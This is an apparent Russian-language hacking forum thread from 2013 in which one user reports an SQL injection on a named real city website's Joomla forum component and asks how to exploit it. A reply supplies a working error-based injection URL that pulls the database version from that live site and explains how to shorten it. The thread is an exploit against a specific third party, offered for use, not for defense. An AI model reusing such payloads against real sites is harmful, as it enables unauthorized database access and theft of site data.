21.01.2013, 20:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
28262
Репутация:
23
|
|
Сообщение от er9j6@
er9j6@ said:
Есть скуля, раскрутить не знаю как
_http://tagilcity.ru/component/option,com_fireboard/func,fbprofile/task,showprf'/?option=com_fireboard&func=showcat&Go=%25D0%2598%2 5D0%25B4%25D1%2582%25D0%25B8&catid=171
Код:
Code:
http://tagilcity.ru/index.php?option=com_fireboard'+AND+(SELECT+4662+FROM(SELECT+COUNT(*),CONCAT(0x7e414e5449434841547e,(SELECT(CASE+WHEN+(4662=4662)+THEN+version()+ELSE+0+END)),0x7e414e5449434841547e,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+AND+'RGKx'='RGKx&func=fbprofile&task=showprf
Найденную Вами SQL инъекцию можно сократить, т.к. запрос один и тот же, только вот первая его часть представлена как ЧПУ, а вторам с GET параметрами, собственно реализацию которой я Вам и продемонстрировал.
|
|
|
|